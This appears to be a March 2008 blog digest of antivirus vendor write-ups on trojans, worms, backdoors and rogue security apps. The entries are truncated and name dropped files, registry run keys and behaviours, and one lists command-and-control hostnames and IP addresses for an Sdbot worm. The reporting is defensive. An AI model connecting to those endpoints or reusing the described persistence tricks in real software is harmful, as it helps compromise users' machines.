Virus Malware and Threat News for 20080331
W32/Sdbot.worm!3D1ACE0E - W32/Sdbot.worm!3D1ACE0E at McAfee
W32/Sdbot.worm!3D1ACE0E will connect to an IRC server and scan the local LAN on port 445 to exploit other
vulnerable machines. The following possible URLs are accessed: dave.own.ccpoweronline.us:2345 (84.244.11.26),
rusk.nswebhost.com:80, tap.tronko.net, serv-5-19-254.lycos-vds.com:2345 (84.244.19.254),
serv-5-19-183.lycos-vds.com:2345 (84.244.1...
Troj/Agent-GUO - Troj/Agent-GUO at Sophos
Troj/Agent-GUO is a Trojan for the Windows platform. When first run
Troj/Agent-GUO copies itself to <Windows>\help\F3C74E3FA248.exe and creates the following file:
<Windows>\help\F3C74E3FA248.dll The file F3C74E3FA248.dll is
detected as Mal/L...
Troj/PhpShell-G - Troj/PhpShell-G at Sophos
Troj/PhpShell-G is a backdoor Trojan for platforms supporting PHP.
Troj/PhpShell-G contains the following functionality: - reports the capabilities of the
PHP interpreter - discovers database functions available to the current PHP install -
server IP addre...
Troj/PhpShell-H - Troj/PhpShell-H at Sophos
...
Troj/PhpShell-I - Troj/PhpShell-I at Sophos
...
Troj/PhpShell-J - Troj/PhpShell-J at Sophos
...
Troj/PhpShell-K - Troj/PhpShell-K at Sophos
...
Troj/PhpShell-L - Troj/PhpShell-L at Sophos
...
Troj/Zlob-AJN - Troj/Zlob-AJN at Sophos
...
Troj/Bifrose-VR - Troj/Bifrose-VR at Sophos
...
Troj/Starter-I - Troj/Starter-I at Sophos
...
0 writebacks [03/31/2008 05:42]
Virus Malware and Threat News for 20080330
W32.Launcer.A - W32.Launcer.A at Norton Symantec
W32.Launcer.A is a worm that spreads through removable drives and displays fake warnings that the operating
system on the compromised computer is pirated.
...
Troj/Bifrose-VQ - Troj/Bifrose-VQ at Sophos
...
Troj/Dropr-B - Troj/Dropr-B at Sophos
...
Troj/PWS-AQT - Troj/PWS-AQT at Sophos
...
Troj/Agent-GUM - Troj/Agent-GUM at Sophos
...
Troj/Dload-BX - Troj/Dload-BX at Sophos
...
W32/SillyFDC-CD - W32/SillyFDC-CD at Sophos
W32/SillyFDC-CD is a worm for the Windows platform. When first run
W32/SillyFDC-CD copies itself to <Windows>\kernelpr.dll and creates the following files:
<Windows>\myproc.dll (detected as W32/SillyFDC-CD) <Windows>\security\services.exe (detected...
Troj/Agent-GUJ - Troj/Agent-GUJ at Sophos
Troj/Agent-GUJ is a Trojan for the Windows platform. When Troj/Agent-GUJ is
installed the following files are created: <System>\dll.dll (also detected as
Troj/Agent-GUJ) <System>\drivers\ipsys.sys (also detected as Troj/Agent-GUJ)
<Windows&...
Troj/Agent-GUK - Troj/Agent-GUK at Sophos
...
Troj/Agent-GUL - Troj/Agent-GUL at Sophos
Troj/Agent-GUL is a Trojan for the Windows platform. When first run
Troj/Agent-GUL copies itself to <Program Files>\WindowsService\msxpsrv.exe and creates the file
<Program Files>\WindowsService\klog.dat. The following registry entry is created
to run msxpsrv.exe o...
Troj/LdPinch-RQ - Troj/LdPinch-RQ at Sophos
Troj/LdPinch-RQ is a Trojan for the Windows platform. When first run
Troj/LdPinch-RQ copies itself to <Windows>\windows live\Messenger.exe. The
following registry entry is created to run Messenger.exe on startup:
HKLM\SOFTWARE\Microsoft\Active Setu...
0 writebacks [03/30/2008 05:43]
Virus Malware and Threat News for 20080329
Packed.Generic.61 - Packed.Generic.61 at Norton Symantec
Packed.Generic.61 is a heuristic detection for files that may have been obfuscated or encrypted in order to
conceal themselves from antivirus software.
...
W32.Tvido.B!inf - W32.Tvido.B!inf at Norton Symantec
W32.Tvido.B!inf is a virus that infects executable files on the compromised computer.
...
WORM_KELVIR.EI - WORM_KELVIR.EI at Trend Micro
This worm arrives on a system as a dropped file of other malware. It may also be downloaded unknowingly by a
user when visiting malicious Web sites. It drops a copy of itself and several non-malicious component files.
It also modifies the affected system's registry to ensure its automatic execution at every system startup. This
worm ...
RenameLoi.A - RenameLoi.A at Panda
It carries out several modifications in the Windows Registry, which prevent the computer from working properly.
It can modify Windows protected files, which could cause problems with the operating system. It spreads
through local, removable and mapped drives.
...
Nakuru.A - Nakuru.A at Panda
It modifies the Internet Explorer window title, changing it to the message Infected by GoKill ...^^v.... This
way, when the user opens a website with Internet Explorer, this message will be displayed in the window title.
It does not spread automatically by its own means.
...
Troj/Agent-GUI - Troj/Agent-GUI at Sophos
Troj/Agent-GUI is a Trojan for the Windows platform. Troj/Agent-GUI
includes functionality to access the internet and communicate with a remote server via HTTP.
When first run Troj/Agent-GUI copies itself to <User>\Application Data\<random name>.exe.
...
Troj/Dloadr-BJW - Troj/Dloadr-BJW at Sophos
Troj/Dloadr-BJW is a Trojan for the Windows platform. Troj/Dloadr-BJW
creates the following registry entry to start itself:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\advap32...
Troj/Dloadr-BJX - Troj/Dloadr-BJX at Sophos
...
Troj/FakeAle-AW - Troj/FakeAle-AW at Sophos
Troj/FakeAle-AW is a Trojan for the Windows platform. When first run
Troj/FakeAle-AW copies itself to <System>\sbwltbxa.exe and creates the file <System>\winfrun32.bin.
The file winfrun32.bin is not malicious and may be deleted. The Trojan may also drop
corrupt fil...
Troj/Nymod-A - Troj/Nymod-A at Sophos
Troj/Nymod-A is a Trojan for the Windows platform. Troj/Nymod-A includes
functionality to access the internet and communicate with a remote server. When
Troj/Nymod-A is run, it drops the file: <System>\^^^^^.exe - proactively detected
as Mal/Basi...
Mal/Agent-G - Mal/Agent-G at Sophos
Mal/Agent-G is a Trojan for the Windows platform.
...
Troj/Bckdr-QMS - Troj/Bckdr-QMS at Sophos
Troj/Bckdr-QMS is a backdoor Trojan which allows a remote intruder to gain access and control over
the computer. When first run Troj/Bckdr-QMS copies itself to <System>\wcbi.exe
and creates the file <System>\iaxcfg32.dll, which is a data file and can be safely deleted.
...
Troj/Dloadr-BJV - Troj/Dloadr-BJV at Sophos
Troj/Dloadr-BJV creates the following registry entry to start itself:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run advap32 <Current>\photo.exe"
/r...
Troj/Flood-IM - Troj/Flood-IM at Sophos
Troj/Flood-IM is a set of EXEs and DLLs that comprise a backdoor Trojan designed to be used as a
Distributed Denial of Service tool. When first run Troj/Flood-IM creates the following
files: <Windows>\edih.dll - detected as Troj/Flood-I
<System>\winnxp.h...
Troj/Lodok-A - Troj/Lodok-A at Sophos
Troj/Lodok-A is a Trojan for the Windows platform. When Troj/Lodok-A is
installed it creates the file <Program Files>\Microsoft Office\system\dodolook_7494.exe.
The file dodolook_7494.exe is detected as Mal/Generic-A. The file dodolook_7494.exe is ...
0 writebacks [03/29/2008 05:42]
Virus Malware and Threat News for 20080328
Exploit:W32/JetDb.C - Exploit:W32/JetDb.C at F-Secure
This sample arrives together with a malicious MS Word document file as a package or attachment to email
messages. The specially crafted file exploits a known Remote Code Execution vulnerability on Microsoft Jet
Database Engine....
Trojan.Acdropper.C - Trojan.Acdropper.C at Norton Symantec
Trojan.Acdropper.C is a Trojan horse that drops Backdoor.Trojan and downloads potentially malicious code on to the compromised
computer....
W32.Imspread.Gen - W32.Imspread.Gen at Norton Symantec
W32.Imspread.Gen is a generic detection for the worm family that spreads through instant message programs. It
may download additional threats and open a back door.
...
PCClean - PCClean at Norton Symantec
PCClean is a misleading application that may give exaggerated reports of threats on the computer.
...
PCAntiSpyware - PCAntiSpyware at Norton Symantec
PCAntiSpyware is a misleading application that may give exaggerated reports of threats on the computer.
...
AntispyDeluxe - AntispyDeluxe at Norton Symantec
AntispyDeluxe is a misleading application that may give exaggerated reports of threats on the computer.
...
MalwareWar - MalwareWar at Norton Symantec
MalwareWar is a misleading application that may give exaggerated reports of threats on the computer.
...
W32/Kely.worm.gen - W32/Kely.worm.gen at McAfee
W32/Kely.worm.gen is a worm that can propagate via network shares and removable drives. Upon execution, it
copies itself to the following folders: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\MSconfig.exe,
%WinDir%\system\lsass.exe, %WinDir%\lsass.exe (where %WinDir% is the default
Windows directory, for example C:\WINNT, ...
W32/Milam.worm - W32/Milam.worm at McAfee
This worm spreads via network shares and could allow an attacker unauthorized remote access to the
compromised machine. The attacker can perform the following actions on the infected machine: retrieve
system information, upload/download files via HTTP/FTP, execute programs remotely, start and stop services, perform
DDOS...
JS/Exploit-ArcServe - JS/Exploit-ArcServe at McAfee
JS/Exploit-ArcServe is a generic detection for the CA BrightStor ARCserve Backup ListCtrl ActiveX Control
buffer overflow vulnerability. The buffer overflow occurs while supplying a long string as a parameter to the
AddColumn function. This vulnerability could be exploited by a malicious user to cause remote code execution.
...
TROJ_MDROPPER.SN - TROJ_MDROPPER.SN at Trend Micro
...
JS_PSYME.BOU - JS_PSYME.BOU at Trend Micro
This malicious JavaScript (JS) script may be downloaded from a certain remote site. It takes advantage of
software vulnerabilities, which allows a remote malicious user or malware to download files on the affected
machine. It connects to a Web site to download a malicious file, which Trend Micro detects as TROJ_VUNDO.BHH.
As a result,...
Selex.B - Selex.B at Panda
It passes itself off as a download manager in order to deceive users and sends spam messages to the email
addresses obtained from the affected computer. It does not spread automatically by its own means.
...
Troj/Agent-GUF - Troj/Agent-GUF at Sophos
...
Troj/Agent-GUG - Troj/Agent-GUG at Sophos
...
Troj/Bifrose-VP - Troj/Bifrose-VP at Sophos
...
W32/Starter-H - W32/Starter-H at Sophos
...
Troj/Agent-GUE - Troj/Agent-GUE at Sophos
...
Troj/Bckdr-QMR - Troj/Bckdr-QMR at Sophos
...
Troj/DwnLdr-HBZ - Troj/DwnLdr-HBZ at Sophos
...
Troj/Spywad-AX - Troj/Spywad-AX at Sophos
Troj/Spywad-AX is a Trojan for the Windows platform. Troj/Spywad-AX
displays fake messages claiming the computer is infected with spyware and then tries to sell the user
antispyware tools. When Troj/Spywad-AX is run, the following files are created:
<...
Troj/BahnDl-Fam - Troj/BahnDl-Fam at Sophos
...
Troj/Oscor-M - Troj/Oscor-M at Sophos
Troj/Oscor-M is a backdoor Trojan for the Windows platform which allows a remote intruder to gain
access and control over the computer. Troj/Oscor-M creates a hidden instance of
Internet Explorer to communicate with the remote server via http POST messages. When
Troj/Oscor-M...
0 writebacks [03/28/2008 05:44]
Virus Malware and Threat News for 20080326
W32.Bancorkut@mm - W32.Bancorkut@mm at Norton Symantec
...
AntispySpider - AntispySpider at Norton Symantec
AntispySpider is a misleading application that may give exaggerated reports of threats on the computer.
...
DCOMAssess - DCOMAssess at Norton Symantec
DCOMAssess is a security assessment tool that scans remote computers for the Microsoft Windows DCOM
RPC Interface Buffer Overrun Vulnerability (BID 8205).
...
TROJ_AGENT.AAAS - TROJ_AGENT.AAAS at Trend Micro
This Trojan may be downloaded from remote sites by other malware. It may also be dropped by other malware.
When executed, it drops a non-malicious file on the system's Desktop. It then creates a certain registry key
as part of its installation routine. It also modifies registry entries to lower the settings of the Internet
Security...
W32/Sdbot-DKG - W32/Sdbot-DKG at Sophos
...
Troj/Agent-GTW - Troj/Agent-GTW at Sophos
...
Troj/Agent-ZLA - Troj/Agent-ZLA at Sophos
Troj/Agent-ZLA is a Trojan for the Windows platform. When first run
Troj/Agent-ZLA copies itself to <System>\Ir32_a.exe <System>\Ir32_b.exe
<System>\Ir32_c.exe and drops the following file: <System>\Vpe.dll,
which is dete...
Troj/Bckdr-QMQ - Troj/Bckdr-QMQ at Sophos
...
Troj/Bizves-F - Troj/Bizves-F at Sophos
Troj/Bizves-F is a Trojan for the Windows platform. Troj/Bizves-F is a backdoor Trojan
which allows a remote intruder to gain access and control over the computer.
Troj/Bizves-F includes functionality to download, install and run new software. When
first run Troj/Bi...
Troj/Dloadr-BJR - Troj/Dloadr-BJR at Sophos
...
Troj/Dwnldr-ZLE - Troj/Dwnldr-ZLE at Sophos
Troj/Dwnldr-ZLE is a Trojan for the Windows platform. Troj/Downldr-ZLE
downloads files from preconfigured URLs and runs them: Troj/Downldr-ZLE
creates registry entries: HKCU\Software\Microsoft\Windows\CurrentVersion\Settings
SN ...
Troj/Dwnldr-ZLI - Troj/Dwnldr-ZLI at Sophos
Troj/Dwnldr-ZLI is a Trojan for the Windows platform. Troj/Downldr-ZLI
downloads a file from a preconfigured URL to the following location and runs it: C:\WINDOWS\svchost.exe...
Troj/Dwnldr-ZLJ - Troj/Dwnldr-ZLJ at Sophos
Troj/Dwnldr-ZLJ is a Trojan for the Windows platform. The following
registry entry is created to run <current filename>.exe on startup:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System <current filename>.exe
Tr...
Troj/Dwnldr-ZLK - Troj/Dwnldr-ZLK at Sophos
Troj/Dwnldr-ZLK is a Trojan for the Windows platform.
Troj/Downldr-ZLK downloads files from preconfigured URLs to the following locations:
<Windows system folder>\wm01.dll <Windows system folder>\wm.exe and runs wm.exe. ...
0 writebacks [03/26/2008 09:42]
Virus Malware and Threat News for 20080325
Keylog-Nosiam - Keylog-Nosiam at McAfee
On execution, this program copies itself into the %windir%\system32 folder. This program creates a text file
called "system32.txt" in the %windir%\system32 folder. It then records the keystrokes into this file. The
recorded key strokes are encrypted. This trojan then connects to a remote server (uni[removed].com) to send the
recorded ke...
Troj/Banloa-FB - Troj/Banloa-FB at Sophos
Troj/Banloa-FB is a Trojan for the Windows platform. When first run
Troj/Banloa-FB copies itself to <Program Files>\Microsoft Studio Files\lsass.exe and creates the file
<Program Files>\Microsoft Studio Files\vcdg.bat.
...
Troj/DwnLdr-HBW - Troj/DwnLdr-HBW at Sophos
...
W32/SillyFD-R - W32/SillyFD-R at Sophos
W32/SillyFD-R is a worm for the Windows platform. When first run
W32/SillyFD-R copies itself to: <System>\autochl.exe
<System>\config\system.exe <System>\dllcache\log.exe <System>\lap.exe
<System>\sserve...
W32/Spybot-OI - W32/Spybot-OI at Sophos
...
Troj/Bckdr-QMP - Troj/Bckdr-QMP at Sophos
...
Troj/LowZone-EA - Troj/LowZone-EA at Sophos
...
W32/Rbot-GWP - W32/Rbot-GWP at Sophos
W32/Rbot-GWP is a worm with IRC backdoor functionality for the Windows platform.
W32/Rbot-GWP runs continuously in the background, providing a backdoor server which allows a remote
intruder to gain access and control over the computer via IRC channels. W32/Rbot-GWP
includes fu...
Troj/Bckdr-QMO - Troj/Bckdr-QMO at Sophos
...
Troj/AspShell-A - Troj/AspShell-A at Sophos
Troj/AspShell-A is an ASP-based backdoor Trojan. Troj/AspShell-A is normally found on compromised webservers.
...
Troj/Keygen-BS - Troj/Keygen-BS at Sophos
Troj/Keygen-BS is a key-generator application for the Windows platform.
...
0 writebacks [03/25/2008 09:42]
Virus Malware and Threat News for 20080324
TROJ_DLOADER.HGS - TROJ_DLOADER.HGS at Trend Micro
This Trojan may be downloaded from remote sites by other malware. It may be dropped by other malware. It may
be downloaded unknowingly by a user when visiting malicious Web sites. It drops a non-malicious file. Upon
execution, it accesses a certain URL to download a malicious file detected by Trend Micro as Mal_Banker. It
then executes ...
BKDR_AGENT.NOZ - BKDR_AGENT.NOZ at Trend Micro
This backdoor may be dropped by other malware. It may be downloaded unknowingly by a user when visiting
malicious Web site(s). It creates a folder and drops a non-malicious file. It creates a registry entry to
enable its automatic execution at every system startup. It also creates a registry key and entry. This backdoor
opens a random p...
BKDR_IRCBOT.GP - BKDR_IRCBOT.GP at Trend Micro
This backdoor may be downloaded from remote site(s) by other malware. It may be dropped by other malware. It
may be downloaded unknowingly by a user when visiting malicious Web site(s). It drops a copy of itself,
terminates the initially executed copy, and executes the dropped copy. The dropped copy is set to Read-only,
Hidden, and Sy...
TROJ_MSJET.C - TROJ_MSJET.C at Trend Micro
...
TROJ_ACCDROP.E - TROJ_ACCDROP.E at Trend Micro
...
TROJ_EMBED.AA - TROJ_EMBED.AA at Trend Micro
...
Troj/Agent-GTR - Troj/Agent-GTR at Sophos
...
Mal/WSPDll-A - Mal/WSPDll-A at Sophos
Mal/WSPDll-A displays characteristics unique to the DLL dropped by Troj/WSPatch-A.
...
Troj/Dloadr-BJQ - Troj/Dloadr-BJQ at Sophos
...
Troj/PDFex-E - Troj/PDFex-E at Sophos
Troj/PDFex-E is a Trojan for the Windows platform that exploits a vulnerability in Adobe Acrobat
and Acrobat reader to drop malicious files. When Troj/PDFex-E is run the following
files are created: - Flate0022 - detected as Mal/JSShell-A - <Root>\a.exe - det...
Mal/EncPk-CW - Mal/EncPk-CW at Sophos
Mal/EncPk-CW is a program packed with a protection system typically used by malware authors.
Files detected as Mal/EncPk-CW are usually password-stealing Trojans.
...
Troj/Bckdr-QMM - Troj/Bckdr-QMM at Sophos
Troj/Bckdr-QMM is a Trojan for the Windows platform. Troj/Bckdr-QMM runs
continuously in the background, providing a backdoor server which allows a remote intruder to gain access and
control over the computer via IRC channels. When first run Troj/Bckdr-QMM copies itself
to <...
Troj/DNSChan-MH - Troj/DNSChan-MH at Sophos
Troj/DNSChan-MH is a Trojan for the Windows platform. Troj/DNSChan-MH
redirects accesses to certain websites by adding entries to the file C:\WINDOWS\system32\drivers\etc\hosts...
Troj/WSPatch-A - Troj/WSPatch-A at Sophos
Troj/WSPatch-A is a Trojan for the Windows platform. When Troj/WSPatch-A is
installed the following files are created: <Current Folder>\803201627461002--ss.jpg
<Current Folder>\803201703461002--ss.jpg <Current Folder>\803201703471002--ss...
0 writebacks [03/24/2008 09:45]
Virus Malware and Threat News for 20080323
WORM_AUTORUN.BT - WORM_AUTORUN.BT at Trend Micro
...
BKDR_AGENT.AU - BKDR_AGENT.AU at Trend Micro
...
BKDR_SINOWAL.BE - BKDR_SINOWAL.BE at Trend Micro
...
TROJ_DROPPER.KUZ - TROJ_DROPPER.KUZ at Trend Micro
...
TROJ_MSPPOINT.AE - TROJ_MSPPOINT.AE at Trend Micro
...
TROJ_DROPPER.ACD - TROJ_DROPPER.ACD at Trend Micro
...
Troj/Banhost-J - Troj/Banhost-J at Sophos
Troj/Banhost-J is a Trojan for the Windows platform. Troj/Banhost-J modifies the
<System>\drivers\etc\hosts file so that attempts to visit certain banking websites will get redirected
to a malicious server.
...
Troj/Banhost-K - Troj/Banhost-K at Sophos
Troj/Banhost-K is a Trojan for the Windows platform. Troj/Banhost-K
modifies the <System>\drivers\etc\hosts file so that attempts to visit certain banking websites will get
redirected to a malicious server.
...
Troj/DwnLdr-HBU - Troj/DwnLdr-HBU at Sophos
...
Troj/DwnLdr-HBV - Troj/DwnLdr-HBV at Sophos
...
Troj/IRCBot-AAT - Troj/IRCBot-AAT at Sophos
...
Troj/Lineag-DJ - Troj/Lineag-DJ at Sophos
...
Troj/Lineag-DK - Troj/Lineag-DK at Sophos
...
Troj/Agent-GTQ - Troj/Agent-GTQ at Sophos
...
Troj/Bckdr-QML - Troj/Bckdr-QML at Sophos
...
Troj/FakeAle-AV - Troj/FakeAle-AV at Sophos
...
0 writebacks [03/23/2008 09:41]
Virus Malware and Threat News for 20080322
Troj/Zlob-AJK - Troj/Zlob-AJK at Sophos
...
W32/IRCBot-AAS - W32/IRCBot-AAS at Sophos
W32/IRCBot-AAS is a worm with IRC backdoor functionality for the Windows platform.
W32/IRCBot-AAS runs continuously in the background, providing a backdoor server which allows a remote
intruder to gain access and control over the computer via IRC channels. When first run
W32/I...
Troj/Agent-GTN - Troj/Agent-GTN at Sophos
Troj/Agent-GTN is a Trojan for the Windows platform. When Troj/Agent-GTN is
installed the following files are created: <System>\hrpdcf.bin (harmless data
file, can be deleted) <System>\mp3res.dll (detected as Troj/Agent-GTN)
<System>\xpr...
Troj/Mdrop-BQY - Troj/Mdrop-BQY at Sophos
Troj/Mdrop-BQY is a Trojan dropper for the Windows platform. Troj/Mdrop-BQY
is a Microsoft Excel document that typically arrives as an email attachment (the subject and message text of
these email messages vary widely). Troj/Mdrop-BQY attempts to exploit a known
vulnerability ...
W32/SillyFDC-CC - W32/SillyFDC-CC at Sophos
...
Troj/Dloadr-BJP - Troj/Dloadr-BJP at Sophos
Troj/Dloadr-BJP is a Trojan for the Windows platform. Troj/Dloadr-BJP
includes functionality to download, install and run new software.
...
Troj/Mdrop-BQX - Troj/Mdrop-BQX at Sophos
Troj/Mdrop-BQX is a Trojan dropper for the Windows platform. Troj/Mdrop-BQX
is a Microsoft Word document that typically arrives as an email attachment (the subject and message text of
these email messages vary widely). Troj/Mdrop-BQX attempts to exploit a known
vulnerability a...
Troj/Sanji-A - Troj/Sanji-A at Sophos
Troj/Sanji-A is a backdoor Trojan for the Windows platform which allows a remote intruder to gain
access and control over the computer. Troj/Sanji-A may be installed by a Trojan such as
Troj/Mdrop-BQX. Trojans such as Troj/Mdrop-BQX are Microsoft Office files (PowerPoint, Word, Access or Excel)
that ...
Troj/Agent-GTO - Troj/Agent-GTO at Sophos
Troj/Agent-GTO is a Trojan for the Windows platform. Troj/Agent-GTO
includes functionality to access the internet and communicate with a remote server via HTTP.
When Troj/Agent-GTO is installed the following file is created (also detected as Troj/Agent-GTO):
...
Troj/Agent-GTP - Troj/Agent-GTP at Sophos
...
0 writebacks [03/22/2008 09:42]
Virus Malware and Threat News for 20080321
Troj/Agent-GTL - Troj/Agent-GTL at Sophos
Troj/Agent-GTL is a Trojan for the Windows platform. Troj/Agent-GTL
intercepts network traffic for the infected computer. Troj/Agent-GTL copies itself onto
removable storage devices such as USB keys that are inserted into the infected computer.
Troj/Ag...
Troj/Agent-GTM - Troj/Agent-GTM at Sophos
...
Troj/Dloadr-BJN - Troj/Dloadr-BJN at Sophos
...
Troj/FakeAV-E - Troj/FakeAV-E at Sophos
Troj/FakeAV-E is a Trojan for the Windows platform. Troj/FakeAV-E
fraudulently reports a user's system as infected and will not clean up these fraudulent reports until the user
pays for and registers the application.
...
Troj/Prorat-DP - Troj/Prorat-DP at Sophos
...
Troj/PWS-AQR - Troj/PWS-AQR at Sophos
...
Troj/Zlob-AJJ - Troj/Zlob-AJJ at Sophos
...
W32/Kobak-A - W32/Kobak-A at Sophos
...
VBS/Psyme-HT - VBS/Psyme-HT at Sophos
...
Mal/Zlob-L - Mal/Zlob-L at Sophos
...
Spyware.OsMonitor - Spyware.OsMonitor at Norton Symantec
Spyware.OsMonitor is a spyware program that may monitor and restrict user activities on the Internet.
...
Bloodhound.Exploit.182 - Bloodhound.Exploit.182 at Norton Symantec
Bloodhound.Exploit.182 is a heuristic detection for files attempting to exploit the RealNetworks RealPlayer
'rmoc3260.dll' ActiveX Control Memory Corruption Vulnerability (BID 28157).
...
Snipher - Snipher at Norton Symantec
Snipher is a security assessment tool used to monitor network traffic.
...
0 writebacks [03/21/2008 09:44]
Virus Malware and Threat News for 20080320
Trojan.Dronjaga - Trojan.Dronjaga at Norton Symantec
Trojan.Dronjaga is a Trojan horse that attempts to download potentially malicious files on to the compromised
computer. It also prevents the compromised computer from restarting.
...
Spyware.PCAgent - Spyware.PCAgent at Norton Symantec
Spyware.PCAgent is a spyware program that records keystrokes from the computer.
...
Adware.Rabio - Adware.Rabio at Norton Symantec
Adware.Rabio is an adware program that installs itself as a Browser Helper Object and displays
advertisements....
0 writebacks [03/20/2008 09:44]
Virus Malware and Threat News for 20080319
Trojan:W32/MonaGray.A - Trojan:W32/MonaGray.A at F-Secure
Trojan:W32/MonaGray.A is a trojan horse that attempts to trick victims into downloading a misleading application
called Unigray Antivirus. Unigray Antivirus is a "rogue" product and is detected as Rogue:W32/Unigray.A.
...
Worm:SymbOS/Beselo.A - Worm:SymbOS/Beselo.A at F-Secure
Beselo.A is an MMS and Bluetooth worm that operates on Symbian S60 Second Edition devices. Beselo.A spreads
via MMS messages and Bluetooth using the filenames beauty.jpg, sex.mp3, or love.rm.
...
Suspicious:W32/Malware!Gemini - Suspicious:W32/Malware!Gemini at F-Secure
Suspicious:W32/Malware!Gemini is a HIPS detection made by the F-Secure scanning engine used by VirusTotal.
VirusTotal is a website to which files may be submitted for scanning by multiple antivirus engines.
...
Backdoor:PHP/Obfu - Backdoor:PHP/Obfu at F-Secure
Obfu is a family of PHP backdoors that operate on any PHP enabled system. The variants belonging to this
family are usually heavily obfuscated to prevent an outright detection of their functionality.
...
Trojan:SymbOS/Kiazha - Trojan:SymbOS/Kiazha at F-Secure
Kiazha is a trojan that operates on Symbian Series 60 2nd Edition devices. Trojan:SymbOS/Kiazha is a trojan
that attempts to ransom money from the user of the device. It is distributed as a component of
Trojan:SymbOS/MultiDropper.A.
...
Trojan-Spy:W32/Zbot.GO - Trojan-Spy:W32/Zbot.GO at F-Secure
Trojan-Spy:W32/Zbot.GO is a trojan that attempts to steal online banking login-information and other sensitive
data from the infected computer.
...
Trojan:SymbOS/MultiDropper - Trojan:SymbOS/MultiDropper at F-Secure
Multidropper is a trojan-dropper that operates on Symbian Series 60 2nd Edition devices. It drops and runs
other malware components on the compromised device.
...
Trojan-Downloader:W32/Agent.BRK - Trojan-Downloader:W32/Agent.BRK at F-Secure
Trojan-Downloader:W32/Agent.BRK attempts to download and install other malware onto the affected system.
...
Worm:VBS/AutoRun.B - Worm:VBS/AutoRun.B at F-Secure
Worm:VBS/AutoRun.B is a worm that spreads by copying itself to local hard drives, network drives, and
removable drives. It has no other functionality.
...
Trojan-Downloader:W32/Small.HSG - Trojan-Downloader:W32/Small.HSG at F-Secure
Trojan-Downloader:W32/Small.HSG downloads and runs a file that is detected as Trojan-Downloader.Win32.Agent.HQL.
This normally arrives as a file dropped by other malware or is downloaded unsuspectingly by the user
from a malicious website.
...
Trojan-Downloader:W32/Agent.JRY - Trojan-Downloader:W32/Agent.JRY at F-Secure
Agent.JRY connects to a website to download additional malware, as well as opens a legitimate PDF file from a
legitimate site....
Trojan-Spy:W32/Agent.BNP - Trojan-Spy:W32/Agent.BNP at F-Secure
Trojan-Spy:W32/Agent.BNP is a banker trojan that attacks the two-way authentication commonly used in banking
systems....
Trojan:SymbOS/SrvSender - Trojan:SymbOS/SrvSender at F-Secure
Trojan:SymbOS/SrvSender affects Symbian Series 60 Second Edition devices. SrvSender responds to all incoming
messages and phone calls with a random SMS message and removes all traces of some incoming messages.
...
Trojan-Dropper:W32/Agent.DSM - Trojan-Dropper:W32/Agent.DSM at F-Secure
It has come to our attention that certain executable files related to Google Earth's installation are falsely
detected by F-Secure Anti-Virus as "Trojan-Dropper.Win32.Agent.DSM" with the anti-virus updates published on
January 21, 2008. The false alarm issue will be addressed with update 2008-01-21_02. We are very sorry for
any poss...
Commwarrior - Commwarrior at F-Secure
Commwarrior is a worm that operates on Symbian Series 60 2nd Edition devices. The worm is capable of
spreading itself via Bluetooth and MMS.
...
Backdoor:Linux/Meche - Backdoor:Linux/Meche at F-Secure
The Backdoor:Linux/Meche family covers a wide base of variants that are based on the EnergyMech IRC bot. The
bot is widely used by miscreants to compromise Linux installations.
...
Worm:SymbOS/Beselo - Worm:SymbOS/Beselo at F-Secure
Beselo is an MMS and Bluetooth worm family that operates on Symbian S60 Second Edition devices. The Beselo
family is very similar to the Commwarrior family but contains enough differences in the code base and behavior
that it is counted as a separate family.
...
Backdoor:W32/Agent.CTH - Backdoor:W32/Agent.CTH at F-Secure
Backdoor:W32/Agent.CTH is a backdoor that can steal information. Stolen information is sent to a collection
site using an HTTP POST command.
...
JS/Advedo - JS/Advedo at F-Secure
JS/Advedo is part of a multi-stage malware that is written in JScript and VBS. This script Trojan is injected
into several legitimate websites and uses several other scripts to ultimately allow a file to be downloaded
onto the infected system. The downloaded file is executed afterwards.
...
Trojan:W32/Agent.EDY - Trojan:W32/Agent.EDY at F-Secure
Trojan:W32/Agent.EDY is a standalone trojan dropper. It drops two EXE files on the computer.
...
Trojan:WinCE/InfoJack - Trojan:WinCE/InfoJack at F-Secure
Trojan:WinCE/InfoJack is a trojan affecting Windows Mobile devices.
...
Worm:W32/AutoRun.BV - Worm:W32/AutoRun.BV at F-Secure
Worm:W32/AutoRun.BV is a worm that propagates by dropping copies of itself on shared and removable drives. It
has the appearance of a document file used for stealth purposes.
...
Backdoor:W32/PoisonIvy - Backdoor:W32/PoisonIvy at F-Secure
Backdoor:W32/PoisonIvy is a family of backdoors that give a remote user extensive access to an infected
computer....
Trojan:SymbOS/Remover.A - Trojan:SymbOS/Remover.A at F-Secure
Remover.A is a Trojan which attempts to remove all files from the phone on the C: and E: drives.
...
Trojan-Downloader:W32/Injecter.GX - Trojan-Downloader:W32/Injecter.GX at F-Secure
Injecter.GX is a trojan-downloader. A trojan-downloader is usually a standalone program that attempts to
silently download and run other files from remote Web and FTP sites.
...
Backdoor:W32/Hupigon - Backdoor:W32/Hupigon at F-Secure
Backdoor:W32/Hupigon is a family of backdoor trojans. It allows a remote user access to the computer.
...
Trojan-Spy:W32/Banker.ICS - Trojan-Spy:W32/Banker.ICS at F-Secure
This is a trojan banking spyware which modifies or deforms the original banking website by injecting additional
HTML code. Other capabilities of this malware are keylogging, logging the user's movement within the website, and
a technique to keylog on some websites that it tracks which use a virtual keypad. This malware
communicat...
Worm:VBS/HeadTail.A - Worm:VBS/HeadTail.A at F-Secure
This Visual Basic Script worm propagates by copying itself to available removable, fixed, and remote drives,
creating an autorun.inf script to enable its execution. Whenever the specified drive is accessed on
systems with the Drive Type Autorun setting enabled, the malware will automatically execute itself.
...
Trojan-Downloader:W32/Agent.EOA - Trojan-Downloader:W32/Agent.EOA at F-Secure
Trojan-Downloader:W32/Agent.EOA was initially associated with the recent PDF exploit malware run (October
2007), detected as Exploit:W32/AdobeReader. Agent.EOA normally arrives as a dropped/downloaded malware
component by other malware running on the infected system. The November 2007 and latest, the January 2008
reports however, now...
Trojan-Downloader:W32/Swizzor.FG - Trojan-Downloader:W32/Swizzor.FG at F-Secure
Swizzor is a small trojan-downloader that can end up on a user's system when they are browsing the Web. The
trojan silently downloads and installs additional trojan downloaders and adware components.
...
Backdoor:W32/IRCBot.BNZ - Backdoor:W32/IRCBot.BNZ at F-Secure
